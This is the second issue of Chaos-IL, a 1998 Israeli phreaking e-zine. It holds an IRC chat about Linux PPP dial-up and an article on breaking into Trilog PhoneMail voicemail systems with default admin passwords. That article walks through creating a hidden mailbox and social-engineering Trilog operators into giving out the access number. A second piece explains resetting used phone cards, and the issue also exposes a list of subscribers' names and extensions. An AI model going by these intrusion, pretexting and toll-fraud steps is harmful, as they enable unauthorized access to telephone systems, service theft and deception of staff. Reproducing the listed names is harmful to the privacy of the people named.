CONNECT " " ogin: xxxx word: xx' /dev/cua0 38400 modem noipdefault defaultroute crtscts debug :) [squish]: yeah, i'm squish'z friend m0ta: call who? [m0ta_boy]: the isp? inet - gold yes i did they don't support linux but i do have script as a matter a fact i have 2 script'z it ain't the script problem netvision give their script oh, u did? ohhhh something fucked up.. *** ^[dSN]^ sets mode: +o Lehavoth THEY SUCK AND THEiR SLOW ( i don't care what obiectivy say) LEAVE INET GOLD NOW ! :) i will i will go to actvnet Br2, if u can only ping your isp nalan even 135 didn't work for him first needa sell my line then it sounds like a route problem 135 works 100% with dip, or any other script Br2: actvnet suck bigtime!@! [d2-rN^_]:1 i can't ping my isp!!! [morpher]:1 framerelay.. not the 8 ppl on one nalan Br2, can u ping anything ? *** Parts: Phalanx (~Phalanx@I-CENTRAL.COM) squish: yeah, 135 doesnt makes problems at any field :) e.g blue boxing :) [d2-rN^_]: yeah, my local ip of the connection that i saw in /var/log/message *** Joins: Phalanx (~Phalanx@I-CENTRAL.COM) yeah :) with 'dip' .. after doing 'mode ppp' dip?! nonononononon ugly *** Joins: BiT (blah@ts002p4.pop6a.netvision.net.il) it just hangs-up Br2: u'w using INET GOld? squish: told me.. u may need a script [m0ta_boy]: yes mode ppp ? u mean pppd ? i do have a script *** Quits: Emaker (bbl..) ppp-up dip works fine [d2-rN^_]: no i mean mode ppp - squish told me Br2: it has nothing to do with it. since the moved all to shani, and started taking 200$ per month they SUCK *** ^[dSN]^ sets mode: +o Phalanx and even that deoesn't work for him d2: ugly??? ITS THE EASYES THING TO USE IT U'R ISP CAN SUPPORT IT DIP RULEZ DIP RULEZ :) i got ppp-up, i dont get yar prob man i tryed and i connected to the net BUT *** m0ta_boy is now known as dip_now just get a cool ppp script and thats all i couldn't use any commands [morpher]: i have one m0ta: no it aint mate :) seriously , it took me 2 months to figure out dip . and 1 hour to figure out pppd but i can't use the commands of the ppp like telnet/ftp/etc... Br2, well u shouldnt b able 2 do that :) but not the remote IP ? they didn't, they take 35$... Session Close: Tue Apr 07 00:51:28 1998 when i asked them Br2: HAHAHAHAHAHA when he tail -f /var/adm/messages shani is the most lagged ass notwork network even shown up... eh should b able 2 do that even :) he GETS a local and remote IP Br2: DO U KNOW THAT SINCE THE TOOK 35$ THEY TOOK THE PRICES UP 3-4 TIMES ?!?!?!??!?!?! Br2: DO U KNOW THAT SINCE THE TOOK 35$ THEY TOOK THE PRICES UP 3-4 TIMES ?!?!?!??!?!?! no i didn't knew that but in the TAROCHA Br2 my friend wait 3month for actvnet nalan they said BEZEQ FREEZE THE NALAN they said squish, errr yeah it's still 35$ Br2: you live in a DIRA? or a private house? dira.. *** Quits: Lehavoth (Read error: 0 (Undefined error: 0)) ok it will cost less bye dude'z *** Easy changes topic to 'Articles for ISSUE3 --> morpher@netlimit.com ACTIVNET=SUX BIG TIME' *** Quits: Br2 (lAST hACKER aROUND BBs - o3.6997657 - *ISRAEL*, 10,000+ h/p/c/v files!) Br2: THEY SUCK. THE PUT EVERY1 ON SHANI NOW (NO NETVISION) SO ITS SLOW AND THEY TAKE TO MUCH MONEY. ITS NOT 35$ BELIVE ME!! m0ta_boy: put the CAPS OFF!!! eheh what do you care *** Quits: d2-rN^_ (Who was this elvis Bloke then, anyway ??) Easy: sorry, i was mad :) ITS SUX! let him order whatever he wishes too blah.. [EOF] _____________________________________________________________________________ 10. Setting your own VMB in Trilog PhoneMail Systems (c) Chaos-IL Foundation 1998 +--------------------------------------------------------+ | | | Setting your own VMB in Trilog PhoneMail Systems | | | +--------------------------------------------------------+ - ---[ by morpher ]--- - Trilog PM Systems What is Trilog? well, Trilog is a Voice/Phone Mail boxes network that provides full VMB (Voice Message Box) services plus options to contact with other VMB boxes on the network. Each VMB has it own network identification number. (Trilog boxes are'nt fully VMB service, but we'll pretend it is so things will be clear :P) Trilog running PM (PhoneMail) monitoring Systems that can be found on the 177 free toll, and soon to be found on the 1-800 free toll also. Each PM system includes her own data of VMBs, User details (the VMB owners, etc.) A Trilog PM system allows you to control and monitor everything possible in the correct data that the PM has. This will article will basically show you the easiest way to set yourself up a VMB on these systems. I think I explained it pretty clearly so if you can't follow this, you have an IQ of 80 or less.. Dumb fucker. As usual, use a scanner to scan for the Trilog PM systems, this is the most easiest part; there are over 20 systems that I know of, in the 177 free toll, if you find one of thier VMBs in the scanning or you just have a number of one somehow, try to dial numbers similar for the VMB to get the Trilog PM sys. For example, if you have some Trilog VMB number... 177-022-1212 try dialing similar numbers such as 177-000-1213 or the like. The PM system that control this VMB you have and many more, are mostly found in the same digit as all of it VMBs are in. This is what a Trilog PM system usually looks like: CARRIER 1200 Trilog PM 9252 9254 Microcode Version 5.2 Copyright (C) PM Systems 1991 All Rights Reserved. PM Login> Older version of Trilog will drop you to a "Command %" prompt but for the most part, use the previous description in identifying them. Typing "?" at the PM Login prompt will show the valid login accounts. PM Login> ? Valid login modes are: SYSADMIN, TECH, POLL. Possible defaults for these account follow: PM Login PM Password -------- ----------- SYSADMIN SYSADMIN,FIELD,TECH,SYS,ADMIN, TECH FIELD,TECH,SYS,ADMIN POLL FIELD,POLL,TECH,SYS,ADMIN PM Login>TECH PM Password> Invalid Password. PM Password> PM Action> (woo-hoo! ..you're in! :P) *NOTE* This time default logins WORKS! They are unexpected for someone to try breaking in. Once logged in, you will most likely get a "PM Action>" prompt. Typing "?" displays the following: PM Action>? The following commands are valid: Activate - Activate the session Broadcast - Broadcast a message to all terminals Connect - Invoke the subsystem Terminate - Terminate the session List - List all open sessions Logout - Terminate all sessions and log off. Login - Logout and login again. Display - Display sessions status on a site. TechView - Enable/Disable TechView training. We first must connect to the subsystem which is where all commands are invoked to control/monitor the voice mail system. Type "connect": PM Action>connect ��� Screen 1 - SVI on Node 1 is now active. You will now be brought to a "Node # - SVI>" prompt. Typing "?" displays the following. Node 1 - SVI>? Sat Jul 6, 1996 6:39 PM ----- INLINE COMMANDS ----- ? help exit ----- UTILITIES ----- AdjustLineLimits APDBUpgrade AssignClasses Backupdatabase BackupFixup5051 BackupNames CallProcessing ChannelTrace CheckLDNetConfig CheckNetWork CleanUpLDN Clearcrashdump ConfigTrilog ConfigSite ConfigTrunk ConvertDB CopyDisk CopySoftWare Cvt37To42 Cvt41To42 CvtFrom42 DB41Upgrade DBXF369To41 Dir DisplayLineLimits DownTrilog EditPBXTrans EnableTNAC ExpandDatabase FEDParameters FFormat FixDB369To41 FixDB37To42 FixNames Fixupdatabase Fixvoicefiles HardReset HDErrorList HdInfo InbandLog InstallFile InstallOption Listconfig ListError ListLDNetConfig Listlog Listoptions ListPrompt ListVersion LoadPrompts MessageTrackingLog MonitorPBXLink MonitorTAPLink NetDetective Newdisk OCConfigAndTest ReassignBlock RemoveOption Reset Restoredatabase RestoreFile RestoreNames Sa ScanDisk SearchCentrexLog Settime StartCentrexLog StartHostLink StopCentrexLog StopHostLink SystemStatus TalkToLDNSite TAlog TestDisk TestHostLink TestPBXLink TestTrilog TestTrunk TestVoice UpDateCBXMWI UpgradeDB UpTrilog "Sa" is the System Administration utility. This command can be passworded (I've found two Trilog PM systems... one was passworded, one wasn't) and accounts such as POLL may not have access to this option. Node 1 - SVI>sa Sat Jul 6, 1996 6:39 PM Trilog is active with 12 Channels Function: Sat Jul 6, 1996 6:40 PM Specify a function - ActivatePM AssignClasses BackupDataBase BackupNames CallProcessing ClassOfService ConfigSite DeactivatePM DList FFormat LDNSiteStat ListLDNMsgLog LogOff MonitorLogon NodeParameters OCConfigAndTest OCMessageLog Profile Reports Status SysParameters SysStatistics At the "Function:" prompt, you can specify different system administration functions. The one we will be working with in setting up a VMB is the "profile" function. Function: profile Sat Jul 6, 1996 6:40 PM Action: ? Specify an action - Add All Clear Delete Fix List Modify Purge The action "All" will display all user profiles. Function: profile Sat Jul 6, 1996 6:40 PM Action: All Subscriber Name Node Extensions Group Name ---------------------- ---- ---------- ----------------------- 1: HERTZOG DAN 1 3508 BDM 2: HOFFMAN NIR 1 3711 PATENTS 3: MOSKOUVITCH YAKOOV 1 3676 BDM 4: DORON SERA 1 3552 SIG91 5: EMMANUEL DAYAN 1 3650 BDM 6: AMDURSKI OREN 1 3579 WALLINGFORD 7: BELTANGADY MOHAN 1 3649 SIG91 3880 8: BALDESTEIN ALEX 1 3656 SIG91 9: DAVID GROSS 1 3580 BDM 10: BERKMAN ARIEL 1 3712 PATENTS 11: GOLDMAN RAFI 1 3531 12: HEROLD LINDA 1 3554 SIG91 13: HEROLD AVI 1 3514 BDM 14: BERNSTEIN ERIC 1 3532 BDM This is usefull especially in this case because you want your mailbox to blend in with the other. In this case, you would want to set up a mailbox at box number 3[5678]XX instead of box 1111 or 9999. The "list" action under system administator function profile, lists a users profile in complete detail showing all settings with their specified mailbox. Function: profile Sat Jul 6, 1996 6:40 PM Action: list Subscriber Name or Extension: 3571 Name (last first) HOFFMAN NIR Class Number 10 Extension Number [ 1]: 3571 Home Site Number 0 Trilog Password ########## Group Name SIG91 Referral Extension 3656 Trilog Capability Accept Messages Answer Phone Do Message Alert TRUE TRUE TRUE Abbreviated Prompts? FALSE Alt Greeting Active? FALSE Software Mailbox FALSE Failed Acc Attempt 0 Number of PDLs Used 0 Waiting Trilog 0 Waiting Trilog ML 0 Sent Trilog 4 Sent Trilog ML 144 Recd Trilog 510 Recd Trilog ML 15413 Direct Calls 553 Forwarded Calls 0 Access Length 37933 Deletions 523 Retention Length 9449 Attempted Outcalls 0 Successful Outcalls 0 Outcall Access Len 0 Future Dlv Messages 0 LDN Exped Msgs Rcvd 11 LDN Exped ML Rcvd 633 LDN Normal Msgs Rcvd 0 LDN Normal ML Rcvd 0 LDN Exped Msgs Sent 0 LDN Exped ML Sent 0 LDN Normal Msgs Sent 0 LDN Normal ML Sent 0 Last Access Time Wed Jul 3, 1996 9:54 AM Last Password Change Wed May 22, 1996 3:18 PM This information can be used as a basis for your information if you're not sure what to enter when adding your own profile. Now, let's add our own profile (mailbox). For this, we use the action "add" under system administration function profile. Function: profile Sat Jul 6, 1996 6:42 PM Action: add Name (last first) : PM Class Number : 10 Extension Number [1] 3500 Extension Number [2] Trilog Password : (Default = ##########): Group Name : (Default = ): Referral Extension : (Default = 0): Trilog Capability: (Default = Accept Messages Answer Phone Do Message Alert TRUE TRUE TRUE Enter T or F for each field): Abbreviated Prompts?: (Default = FALSE): Alt Greeting Active?: (Default = FALSE): Software Mailbox : (Default = FALSE): Failed Acc Attempt : (Default = 0): If you wish to exit, type ";". First Field of Form: Name (last first) : (Previous = PM): ; Done. Name (last first) : ; Now we have our own mailbox at box #3500. (for access info see end of article) Let's take a closer look at the steps involved: Name (last first) : PM Selecting a name. Here, i chose "PM" as i thought the System Admin to be an idiot who would think it is a default box and not to mess with it. A regular name will blend in well with the others though. Class Number : 10 Selecting a class number designates what class your mailbox is under. Certain classes have different options such as being able to have more messages w/o being forced to delete them or having the dialout feature. Check out the "ClassOfService" function. Extension Number [1] 3500 Enter a mailbox number you wish to have which is empty. Extension Number [2] If you want to set up more than one mailbox with the same profile. Trilog Password : (Default = ##########): Enter the password you would like to have. It will not be echoed to the screen. Group Name : (Default = ): Referral Extension : (Default = 0): Trilog Capability: (Default = Accept Messages Answer Phone Do Message Alert TRUE TRUE TRUE Enter T or F for each field): Abbreviated Prompts?: (Default = FALSE): Alt Greeting Active?: (Default = FALSE): Software Mailbox : (Default = FALSE): Failed Acc Attempt : (Default = 0): Go with the defaults for a regular mailbox here. They should be set up correctly. If you wish to exit, type ";". First Field of Form: Name (last first) : (Previous = PM): ; Done. Name (last first) : ; Keep smacking ";" to exit. Now let's verify that the profile was added. Function: profile Sat Jul 6, 1996 6:45 PM Action: list Subscriber Name or Extension: 3500 Name (last first) PM Class Number 10 Extension Number [ 1]: 3500 Home Site Number 0 Trilog Password ########## Group Name Referral Extension 0 Trilog Capability Accept Messages Answer Phone Do Message Alert TRUE TRUE TRUE Abbreviated Prompts? FALSE Alt Greeting Active? FALSE Software Mailbox FALSE Failed Acc Attempt 0 Number of PDLs Used 0 Waiting Trilog 0 Waiting Trilog ML 0 Sent Trilog 0 Sent Trilog ML 0 Recd Trilog 0 Recd Trilog ML 0 Direct Calls 0 Forwarded Calls 0 Access Length 0 Deletions 0 Retention Length 0 Attempted Outcalls 0 Successful Outcalls 0 Outcall Access Len 0 Future Dlv Messages 0 LDN Exped Msgs Rcvd 0 LDN Exped ML Rcvd 0 LDN Normal Msgs Rcvd 0 LDN Normal ML Rcvd 0 LDN Exped Msgs Sent 0 LDN Exped ML Sent 0 LDN Normal Msgs Sent 0 LDN Normal ML Sent 0 Last Access Time Sat Jul 6, 1996 6:42 PM Last Password Change Sat Jul 6, 1996 6:43 PM Subscriber Name or Extension: Good. You now have a VMB. Accessing your VMB's 177 number +-----------------------------+ Ok, you got your box up at #BLABLA on the network, at this point we get into a little problem but one that can be simply resolved. At regular situations, the persons who own the VMBs and paying for them, getting the 177 access number to thier box at the time they are registering, but we didnt :)) so the last mighty thing we can do, is calling Trilog and fooling them so you'll get your new box access number and start running things up. Follow me and dont mix bullshits, you'll have your VMB access number in less then 2 mins. The Trilog Info. center is at 177-022-4470 : The direct number to the Info. center cannot be found, or they dont publish it. If anyone finds it sooner or later, please hook me up and email me. Call up the Info. Center and wait for an operator to pick up on you, give them your box number as your setting in the PM system. (e.g #3500). simply say that you are leaving Israel in a few days for a trip, and you want to give your friends the VMB 177 number so they can leave you msgs while you are away. In 90% of the cases she'll simply give you the number and say a nice byebye, in 70% of the cases she'll ask a few identification questions and then give you the number :)) (she wont ask anything like card number, etc. only info printed at her desk.. and that's actually the info that you saw while setting your VMB up. Remember to print/capture this info so you'll know what to answer the Trilog operator when you'll be asked. *Have phun* morpher. 11. TeleCards Resetting TeleCards Resetting ------------------- Telecards' working method is a really simple one actually, all they check for is those little black magnatic lines which mark the usage of a call. Now, you may wonder how the fuck can i use it for my benefits ? , well,let me tell you how you can do such a thing. All you need is a niddle and a magnet. The first thing you do is taking a telecard, used of course,Take the niddle and squize it in the middle of the black line, after you've succeeded in doing that, and brought that black stripe to the edge of the card,just simply take a magnet, and pull the black stripe with it, it might take a while until you get the hang of it,but finally you'll do it right. After doing that, you can actually reset the whole card and make it new again, over and over again. NOTE: ------ Since Bezeq has learnt about that method, you should search for the older cards which don't have a plastic cover on that black stripe. OXiD 09. Resources & Credits Chaos-IL would like to greet every possible resource who supported us or helped us in any kind of a way. Bezeq TeleCommunictions INC. Barak Israel-International INC. GreenShop Computers (TEL-AVIV) IDC Communications INC. AT&T Communications INC. SPRINT Global-One Communications Israel Telegraph LTD. 2600 Magazine Phrack INC. Newsletter Informatik E-Magazine PLA-Phone Losers of America Hacker's Heaven (BBS) Underground Society (BBS) Route 66 (BBS) Liquid Underground (BBS) #hack #phreak #telephony #punx #root www.border.com www.etext.org www.l0pht.com www.lat.com www.liquid98.com www.itd.nrl.navy.mil ftp.fc.net The Prototype Captain Crunch Emmanuel Goldstein TS (Bezeq 144/199 Operator) CB (Bezeq 188 Operator) NI (Sprint Global One Operator) Retro Manomaker Unix geek Phriend The Milkman Anti-D Lizzard King Stoner Dr. Grass Dead Zed Blackbird Prophet Substance Stoner F0k Mindroot Toast BelowZero *ALL of Chaos-IL Members -[EOI#2]---------------------------------------------------------------------- (c) Chaos-IL Foundation April 1998